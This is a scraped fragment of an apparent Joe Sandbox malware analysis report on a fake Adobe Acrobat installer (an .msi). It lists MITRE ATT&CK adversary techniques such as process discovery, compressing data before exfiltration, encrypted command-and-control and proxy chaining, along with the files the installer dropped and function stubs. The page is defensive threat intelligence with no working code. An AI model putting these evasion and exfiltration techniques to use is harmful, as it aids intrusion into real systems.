Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. A particular variant of this behavior is to use onion routing networks, such as the publicly available TOR network.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Adobe_Acrobate_Reader_Pro-HAv70.msi

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Config.Msi\64d7be.rbs

C:\ProgramData\Vso\font.cache

C:\Users\user\AppData\Local\585948

C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe

C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\avutil.dll

C:\Windows\Installer\64d7bc.msi

C:\Windows\Installer\MSIDD98.tmp

C:\Windows\Installer\MSIDE35.tmp

C:\Windows\Installer\MSIDE94.tmp

C:\Windows\Installer\MSIDEC4.tmp

C:\Windows\Installer\MSIDF32.tmp

C:\Windows\Installer\MSIE0C9.tmp

C:\Windows\Installer\SourceHash{C9BC840A-0E96-4595-AE16-15CAE1E4F236}

Windows Analysis Report
Adobe_Acrobate_Reader_Pro-HAv70.msi

Function 1CC0570A Relevance: 1.6, APIs: 1, Instructions: 71
nativethreadCOMMON

Function 1CB06B1B Relevance: 1.5, APIs: 1, Instructions: 46
nativeCOMMON

Function 1CA517E2 Relevance: 1.5, APIs: 1, Instructions: 28
nativeCOMMON

Function 1CB5F601 Relevance: 1.5, APIs: 1, Instructions: 12
nativeCOMMON

Function 19C9ADF7 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 105
memoryCOMMON

Function 1CC9A1CF Relevance: .0, Instructions: 42
COMMON

Function 19E5E6FD Relevance: .0, Instructions: 39
COMMON

Function 19E1F065 Relevance: .0, Instructions: 22
COMMON

Function 1B39F4ED Relevance: .0, Instructions: 12
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre